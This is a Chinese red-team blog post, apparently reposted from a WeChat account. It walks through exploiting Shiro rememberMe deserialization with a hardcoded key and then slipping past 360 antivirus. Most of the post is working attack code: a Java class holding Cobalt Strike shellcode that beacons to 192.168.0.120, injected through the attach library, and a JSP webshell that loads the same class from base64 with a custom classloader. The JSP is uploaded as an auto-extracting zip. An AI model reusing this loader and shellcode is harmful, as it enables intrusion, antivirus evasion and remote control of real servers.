红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截

admin
admin
admin
101086
文章
87
评论
2022年9月26日18:33:43评论91 views字数 13727阅读45分45秒阅读模式
红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截
红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截

1介绍

通常在反序列化的时候会遇到安全软件进行命令执行拦截,可以用此方法进行绕过。

2过程

登录某站发现存在 rememberme信息 判断是shiro

红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截

找到源码 在配置文件里找到加密的硬编码 用工具进行反序列化利用

红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截

对进程进行查询存在360全家桶

红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截

存在360安全卫士 它会对cmd的危险命令进行拦截。

3jsp加载shellcode上线cs

因为后台存在模块 存在自解压 将jsp后缀的文件打包zip上传自动解压在当前目录。
所以可以使用jsp加载shellcode上线cs
使用cs生成java shellcode 再使用base64编码

import java.io.IOException;public class WindowsVirtualMachine {    public WindowsVirtualMachine() {    }    static native void enqueue(long var0, byte[] var2, String var3, String var4, Object... var5) throws IOException;    static native long openProcess(int var0) throws IOException;    public static void run(byte[] buf) {        System.loadLibrary("attach");        buf = new byte[] {-4, 72, -125, -28, -16, -24, -56, 0, 0, 0, 65, 81, 65, 80, 82, 81, 86, 72, 49, -46, 101, 72, -117, 82, 96, 72, -117, 82, 24, 72, -117, 82, 32, 72, -117, 114, 80, 72, 15, -73, 74, 74, 77, 49, -55, 72, 49, -64, -84, 60, 97, 124, 2, 44, 32, 65, -63, -55, 13, 65, 1, -63, -30, -19, 82, 65, 81, 72, -117, 82, 32, -117, 66, 60, 72, 1, -48, 102, -127, 120, 24, 11, 2, 117, 114, -117, -128, -120, 0, 0, 0, 72, -123, -64, 116, 103, 72, 1, -48, 80, -117, 72, 24, 68, -117, 64, 32, 73, 1, -48, -29, 86, 72, -1, -55, 65, -117, 52, -120, 72, 1, -42, 77, 49, -55, 72, 49, -64, -84, 65, -63, -55, 13, 65, 1, -63, 56, -32, 117, -15, 76, 3, 76, 36, 8, 69, 57, -47, 117, -40, 88, 68, -117, 64, 36, 73, 1, -48, 102, 65, -117, 12, 72, 68, -117, 64, 28, 73, 1, -48, 65, -117, 4, -120, 72, 1, -48, 65, 88, 65, 88, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, -125, -20, 32, 65, 82, -1, -32, 88, 65, 89, 90, 72, -117, 18, -23, 79, -1, -1, -1, 93, 106, 0, 73, -66, 119, 105, 110, 105, 110, 101, 116, 0, 65, 86, 73, -119, -26, 76, -119, -15, 65, -70, 76, 119, 38, 7, -1, -43, 72, 49, -55, 72, 49, -46, 77, 49, -64, 77, 49, -55, 65, 80, 65, 80, 65, -70, 58, 86, 121, -89, -1, -43, -21, 115, 90, 72, -119, -63, 65, -72, -71, 8, 0, 0, 77, 49, -55, 65, 81, 65, 81, 106, 3, 65, 81, 65, -70, 87, -119, -97, -58, -1, -43, -21, 89, 91, 72, -119, -63, 72, 49, -46, 73, -119, -40, 77, 49, -55, 82, 104, 0, 2, 64, -124, 82, 82, 65, -70, -21, 85, 46, 59, -1, -43, 72, -119, -58, 72, -125, -61, 80, 106, 10, 95, 72, -119, -15, 72, -119, -38, 73, -57, -64, -1, -1, -1, -1, 77, 49, -55, 82, 82, 65, -70, 45, 6, 24, 123, -1, -43, -123, -64, 15, -123, -99, 1, 0, 0, 72, -1, -49, 15, -124, -116, 1, 0, 0, -21, -45, -23, -28, 1, 0, 0, -24, -94, -1, -1, -1, 47, 53, 120, 86, 90, 0, -26, -72, 73, 51, -93, 100, 87, 125, 41, -120, -41, 54, 57, -57, 77, -106, -118, 122, 35, -128, 18, 127, 48, -24, -102, -85, -52, 81, 54, -36, 90, 78, -64, 51, -88, 110, -55, 80, 70, 26, 123, 44, -84, 24, -103, 118, 116, -18, 38, -116, -117, -61, 84, -22, 87, -6, 98, 11, -67, 82, 46, -122, -47, -17, -59, 65, 82, 93, 53, 10, -13, 8, 85, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, 83, 73, 69, 32, 57, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 53, 46, 48, 41, 13, 10, 0, 6, -116, 2, -26, -20, -117, -107, 67, -84, 41, -39, -50, -114, 75, -29, -52, -84, 123, 75, 113, 90, 89, 20, -26, 111, 61, -128, 87, -89, -20, -116, -82, 122, -49, 61, -128, -53, 56, 98, 55, -105, 102, -47, -80, -94, 110, -99, -127, -112, 10, -85, 60, -83, 24, 50, 61, 116, 102, 42, 19, 11, 71, -29, 3, -30, -20, 110, -57, 101, 24, 104, -28, 48, 56, -88, 34, 42, 27, -10, -42, 74, 20, 14, 76, 9, 98, -48, -40, -19, -97, 9, 84, -35, 110, -66, 48, 33, -54, 36, -113, -57, 14, 2, 44, 40, -54, -69, 94, 30, 24, 105, -62, 80, 56, 109, 69, -87, 125, 66, 3, 53, 25, 51, -36, -88, 95, -39, 66, 10, 23, -19, -24, 110, 32, -46, 31, -61, -37, -19, 38, 103, -39, -49, -41, -54, -34, 113, 31, -20, -41, -88, 63, 127, 2, -7, -80, 79, -62, -91, 14, -86, -48, -123, 21, 125, 61, -53, 110, -26, 51, 63, 68, -126, -97, -109, -17, -45, -114, -12, 42, -105, 32, 17, -13, -53, -111, -126, 42, 51, 36, -88, -116, -35, -12, -109, -92, -30, -52, -83, 78, 59, 96, -71, 61, -29, 104, -109, 88, -80, -111, 68, -36, 44, 71, 35, 24, -108, 10, 0, 65, -66, -16, -75, -94, 86, -1, -43, 72, 49, -55, -70, 0, 0, 64, 0, 65, -72, 0, 16, 0, 0, 65, -71, 64, 0, 0, 0, 65, -70, 88, -92, 83, -27, -1, -43, 72, -109, 83, 83, 72, -119, -25, 72, -119, -15, 72, -119, -38, 65, -72, 0, 32, 0, 0, 73, -119, -7, 65, -70, 18, -106, -119, -30, -1, -43, 72, -125, -60, 32, -123, -64, 116, -74, 102, -117, 7, 72, 1, -61, -123, -64, 117, -41, 88, 88, 88, 72, 5, 0, 0, 0, 0, 80, -61, -24, -97, -3, -1, -1, 49, 57, 50, 46, 49, 54, 56, 46, 48, 46, 49, 50, 48, 0, 73, -106, 2, -46};        try {            enqueue(-1L, buf, "test", "test");        } catch (Exception var2) {            var2.printStackTrace();        }    }
    public static void main(String[] args) {        WindowsVirtualMachine.run(new byte[]{});    }}


再使用自定义类加载器加载shellcode即可

<%@ page import="java.lang.reflect.Method" %><%@ page import="java.util.Base64"%><%!    public static class Myloader extends ClassLoader{        public Class get(byte[] b) {            return super.defineClass(b, 0, b.length);        }    }%><%    try {        String classStr="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";        Class result = new Myloader().get(Base64.getDecoder().decode(classStr));        for (Method m:result.getDeclaredMethods())        {            System.out.println(m.getName());            if (m.getName().equals("run"))            {                m.invoke(result,new byte[]{});            }        }    } catch (Exception e) {        e.printStackTrace();    }%>

在后台上传后解压访问shellcode.jsp 即可

红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截

执行后 最好 再注入进程里 不然网站会崩坏。再把当前的shellcod结束即可。

4关注

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏

5关于培训

需要渗透测试培训可联系暗月

手机扫一扫 即可添加好友咨询

红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截
课程详细介绍点击即可了解
暗月渗透测试课程更新

原文始发于微信公众号(moonsec):红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月26日18:33:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队攻击第2篇 实战 shiro 反序列化绕过360全家桶拦截http://cn-sec.com/archives/1316750.html

发表评论

匿名网友 填写信息